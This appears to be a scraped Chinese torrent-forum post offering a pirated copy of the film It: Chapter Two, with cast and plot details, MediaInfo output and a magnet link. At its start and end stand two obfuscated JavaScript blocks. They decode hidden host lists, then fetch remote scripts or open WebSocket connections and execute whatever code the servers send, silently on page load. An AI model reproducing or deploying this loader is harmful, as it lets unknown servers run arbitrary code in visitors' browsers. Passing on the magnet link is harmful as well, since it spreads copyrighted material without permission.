小丑回魂2[中文字幕].It.Chapter.Two.2019.1080p.NF.WEB-DL.DDP5.1.x264 4.81GB

版主小s 1月前 868

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

image.png

◎译 名 小丑回魂2 / 它:第二章(台) / It 2

◎片 名 It: Chapter Two

◎年 代 2019

◎产 地 加拿大 / 美国

◎类 别 剧情 / 恐怖 / 奇幻

◎语 言 英语

◎上映日期 2019-09-06(美国)

◎IMDb链接 https://www.imdb.com/title/tt7349950/

◎豆瓣评分 6.4/10 (61791人评价)

◎豆瓣链接 https://movie.douban.com/subject/27133569/

◎片 长 169分钟

◎导 演 安德斯·穆斯切蒂 Andrés Muschietti (id:1326370)

◎编 剧 加里·多伯曼 Gary Dauberman (id:1344029)

斯蒂芬·金 Stephen King (id:1049547)

◎演 员 詹姆斯·麦卡沃伊 James McAvoy (id:1006958)

杰西卡·查斯坦 Jessica Chastain (id:1000225)

比尔·斯卡斯加德 Bill Skarsg?rd (id:1022798)

比尔·哈德尔 Bill Hader (id:1017902)

索菲娅·莉莉丝 Sophia Lillis (id:1379835)

杰克·迪伦·格雷泽 Jack Dylan Grazer (id:1380979)

菲恩·伍法德 Finn Wolfhard (id:1359349)

杰顿·李博赫 Jaeden Lieberher (id:1341335)

特洛伊·詹姆斯 Troy James (id:1403992)

哈维尔·博泰特 Javier Botet (id:1247131)

杰·瑞恩 Jay Ryan (id:1179559)

斯蒂芬·金 Stephen King (id:1049547)

杰克逊·罗伯特·斯科特 Jackson Robert Scott (id:1372361)

杰里米·雷·泰勒 Jeremy Ray Taylor (id:1380977)

泽维尔·多兰 Xavier Dolan (id:1032111)

杰克·威利 Jake Weary (id:1210515)

尼古拉斯·汉密尔顿 Nicholas Hamilton (id:1362445)

杰丝·威克斯勒 Jess Weixler (id:1018045)

詹姆斯·兰索恩 James Ransone (id:1147933)

瓦耶特·奥莱夫 Wyatt Oleff (id:1343727)

欧文·泰格 Owen Teague (id:1380982)

艾赛亚·穆斯塔法 Isaiah Mustafa (id:1328060)

安迪·比恩 Andy Bean (id:1383557)

蒂奇·格兰特 Teach Grant (id:1389689)

泰勒·弗雷 Taylor Frey (id:1338510)

贾森·福克斯 Jason Fuchs (id:1032466)

乔森·雅各布 Chosen Jacobs (id:1380978)

斯蒂夫·博加尔特 Stephen Bogaert (id:1350047)

洛根·汤普森 Logan Thompson (id:1380981)

杰克·辛 Jake Sim (id:1380980)

维尔·贝布林克 Will Beinbrink (id:1328852)

安东尼·尤埃西 Anthony Ulc (id:1148731)

周多多 Amanda Zhou (id:1422887)

彼得·博格丹诺维奇 Peter Bogdanovich (id:1022754)

卢克·勒斯勒尔 Luke Roessler (id:1393294)

利亚姆·麦克唐纳 Liam MacDonald (id:1427520)

迪凡·迈耶 Divan Meyer (id:1437186)

珍妮特·波特 Janet Porter (id:1452522)

林单 Dan Lin (id:1429091)

◎标 签 恐怖 / 惊悚 / 美国 / 小丑 / 2019 / 小说改编 / 超自然 / 成长

◎简 介

1989年与小丑(比尔·斯卡斯加德 Bill Skarsg?rd 饰)的大战过后,窝囊废联盟的好友们各自长大,他们曾经相约当黑暗再次到来时,将再次集结德里镇,与小丑做最后的决断。可是当小丑再度出现的消息到来之时,窝囊废联盟的好友们却迎来了前所未有的内心冲击。有的人选择终结生命,而比利(詹姆斯·麦卡沃伊 James McAvoy 饰)、瑞奇(比尔·哈德尔 Bill Hader 饰)、贝弗莉(杰西卡·查斯坦 Jessica Chastain 饰)、本(杰·瑞恩 Jay Ryan 饰)等人却在留守的麦克(艾赛亚·穆斯塔法 Isaiah Mustafa 饰)的召唤下重返噩梦故乡。愈加狡猾的小丑肆意攻击着每个人心灵最脆弱的部分,噩梦似乎没有终结……

本片根据斯蒂芬·金的同名原著改编。

◎获奖情况 (共1项)

第7届美国化妆及发型设计工会奖 (2020)

电影类最佳特效化妆(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 63315526739257648101127780500285761688 (0x2FA2207BCF28BE8B9D33D55A89352898)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.80 GiB

  8. Duration : 2 h 49 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 4 059 kb/s

  11. Encoded date : UTC 2021-11-02 02:15:25

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 49 min

  24. Bit rate mode : Variable

  25. Bit rate : 3 417 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 23.976 (24000/1001/53354) FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.069

  37. Stream size : 4.04 GiB (84%)

  38. Writing library : x264 core 148 r2717 0d2410d

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. Format : E-AC-3

  45. Format/Info : Enhanced AC-3

  46. Commercial name : Dolby Digital Plus

  47. Codec ID : A_EAC3

  48. Duration : 2 h 49 min

  49. Bit rate mode : Constant

  50. Bit rate : 640 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 776 MiB (16%)

  57. Title : English

  58. Language : English

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : UTF-8

  65. Codec ID : S_TEXT/UTF8

  66. Codec ID/Info : UTF-8 Plain Text

  67. Duration : 2 h 44 min

  68. Bit rate : 60 b/s

  69. Count of elements : 2839

  70. Stream size : 73.3 KiB (0%)

  71. Title : English

  72. Language : English

  73. Default : Yes

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : UTF-8

  78. Codec ID : S_TEXT/UTF8

  79. Codec ID/Info : UTF-8 Plain Text

  80. Duration : 2 h 48 min

  81. Bit rate : 44 b/s

  82. Count of elements : 2338

  83. Stream size : 55.0 KiB (0%)

  84. Title : Chinese Simplified

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : UTF-8

  91. Codec ID : S_TEXT/UTF8

  92. Codec ID/Info : UTF-8 Plain Text

  93. Duration : 2 h 48 min

  94. Bit rate : 38 b/s

  95. Count of elements : 2124

  96. Stream size : 48.1 KiB (0%)

  97. Title : Chinese Traditional

  98. Language : Chinese

  99. Default : No

  100. Forced : No




复制代码


TAGS 奇幻 剧情 恐怖

磁力链:
  • magnet:?xt=urn:btih:5EFCC579EDB508597CD6B53ACF3D97D63B7AC1B1

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};